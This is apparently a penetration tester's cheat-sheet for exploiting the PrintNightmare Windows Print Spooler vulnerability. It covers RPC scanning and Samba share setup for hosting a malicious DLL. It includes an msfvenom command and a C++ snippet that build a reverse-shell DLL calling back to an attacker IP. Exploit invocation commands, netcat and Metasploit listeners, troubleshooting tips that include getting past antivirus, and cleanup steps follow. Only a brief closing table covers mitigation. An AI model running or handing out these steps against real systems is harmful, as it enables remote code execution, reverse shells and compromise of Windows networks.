Printnightmare
Requirements
A user account. (privs don’t mather)
Scan
RPC Dump
If you can reach these RPC interfaces you might be able to use printnightmare.
rpcdump.py @ip | egrep 'MS-RPRN|MS-PAR'
It Was All A Dream
https://github.com/byt3bl33d3r/ItWasAllADream
git clone https://github.com/byt3bl33d3r/ItWasAllADream
cd ItWasAllADream && docker build -t itwasalladream .
docker run -it itwasalladream -u user -p password -d domain 192.168.1.0/24
docker cp <container-id>:/report_XXXXXXX ./
Setup tool for remote RCE (cube0x0)
Ensure you have a impacket version that has this PR merged.
mkdir printnightmare
cd printnightmare
mkdir payloads
git clone https://github.com/justin-p/CVE-2021-1675
Then if you are lazy just use the Taskfile included in the repo.
task payload_folder
task printnightmare_samba_share
To restore the smb.conf and stop the service run
task restore_samba
Otherwise use the steps below
Host Dll
Make a backup of your smb.conf
sudo cp /etc/samba/smb.conf etc/samba/smb.conf.bak
Overwite the file with the following content
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /home/user/Documents/printnightmare/payloads/
guest ok = yes
read only = no
browsable = yes
force user = nobody
Ensure the files are owned by nobody
sudo chown nobody:user -R /home/user/Documents/printnightmare/payloads/
sudo chmod -R 777 /home/user/Documents/printnightmare/payloads/
Restart the smbd service
sudo service smbd restart
Don’t forget to restore the SMB config and disable the service :)
sudo cp /etc/samba/smb.conf etc/samba/smb.conf.bak
sudo service smbd stop
Outflanks implementation
https://github.com/outflanknl/PrintNightmare
Did not test this yet. But seems ‘better’ then the cube0x0 implementation
Create DLL
MSVenom if you think AV is not a problem. Otherwise build something custom.
MSFVenom
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /home/user/Documents/printnightmare/payloads/rev.dll
Custom simple C++ reverse shell example
-
Install C++ tools in visual studio.
-
Create new project with Dynamic-Link Libary template.
-
Download the
plain_revshell.cppfile and paste the content into the existing template.
- Update the RHOST & RPORT on StartCallback
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH:
StartCallback("172.16.0.137", 80); // <- update this
-
Build the release (ctrl+shift+b)
-
Place the DLL in the payloads folder
Usage
python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py 'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'
There are 3 different version. All versions have been updated to support a custom driver/printername.
| Version | Info | When to use |
|---|---|---|
| MSPAR | Abuses MSPAR | When ItWasAllADream says its vulnerable |
| MSRPRN | Abuses MSRPRN | When ItWasAllADream says its vulnerable |
| MSRPRN_nobrute | Abuses MSRPRN but does not brute force driver folders, see this pull | When ItWasAllADream says its vulnerable but it does not seem to work and you tried everything listed in Errors & tips |
Errors & tips
| Error | Solution |
|---|---|
| DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied | permissions on the file in the SMB share |
| RPRN SessionError: unknown error code: 0x180 | Enable SMB2Support |
| RPRN SessionError: code: 0x2: - ERROR_FILE_NOT_FOUND - The system cannot fil the file specified. | Typo in supplied DLL ? |
| RPRN SessionError: code: 0xd8 - ERROR_EXE_MACHINE_TYPE_MISMATCH | DLL is kaduk or wrong architect (x86 vs x64) |
| RPRN SessionError: code 0xe1 - ERROR_VIRUS_INFECTED | AV caught you butt, try harder |
| RPRN SessionError: Unknown error code: 0x8001011b | Seems like the host is patched |
| RPRN SessionError: code: 0x43 ERROR_BAD_NET_NAME | Wrong share name used in printnightmare or typo in samba config |
| SMB SessionError: STATUS_PIPE_BROKEN | Print spooler service crashed during payload execution. Restart the spooler if you got a shell (PowerShell -> Restart-Service spooler. CMD -> net stop spooler && net start spooler) |
| After killing the session the payload does not work a second time | Always ensure the first thing you do is restart the spooler service upon a shell connect. If you did this, use a different printername. Otherwise ur fuk’d |
| Sometimes when removing the print drivers the dll will execute again. This means your payload will run again. | Nothing, just something to be aware of if you use a payload that adds a user or w.e. |
Check if system reaches out
By simply trying to connect to a nc instance we can verify that the system can reach our smb server.
Start nc on 445.
sudo nv -nlvp 445
Run MSRPRN_nobrute and try to connect to nc.
python3 MSRPRN_nobrute.py 'user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'
Exploit
Setup a listener
Netcat
nc -nlvp 80
MSF multi handler
msfconsole -x "use exploit/multi/handler;\
set payload windows/shell_reverse_tcp;\
set LHOST 172.16.0.137;\
set LPORT 80;\
set ExitOnSession false;\
run -j"
Run printnightmare
python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py 'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'
net stop spooler && net start spooler
Cleanup
PowerShell
Load PrintManagement PS Module (should be loaded by default on W10)
Import-Module PrintManagement
List current print drivers
Get-PrinterDriver
Remove print drivers
Get-PrinterDriver -Name PrinterName
Oneliner
Watch out, Where-Object uses Wildcards to get both drivers that get installed (PrinterName0, PrinterName1). Also, make sure to update the dllname.dll in the Get-Item action.
Restart-Service Spooler;Import-Module PrintManagement;Get-PrinterDriver | Where-Object {$_.Name -like "*PrinterName*"} | Remove-PrinterDriver;Stop-Service spooler;Start-Sleep -s 2;Get-Item 'C:\windows\system32\spool\drivers\x64\3\New\','C:\windows\system32\spool\drivers\x64\3\Old\','C:\windows\system32\spool\drivers\x64\3\dllname.dll' -ErrorAction SilentlyContinue | Remove-Item;Start-Service spooler;Start-Sleep -s 2;Get-PrinterDriver
Mitigation
| Method | Fix |
|---|---|
| RCE MSRPRN | Update Windows |
| RCE MSPAR | Update Windows |
| LPE | Not tested yet |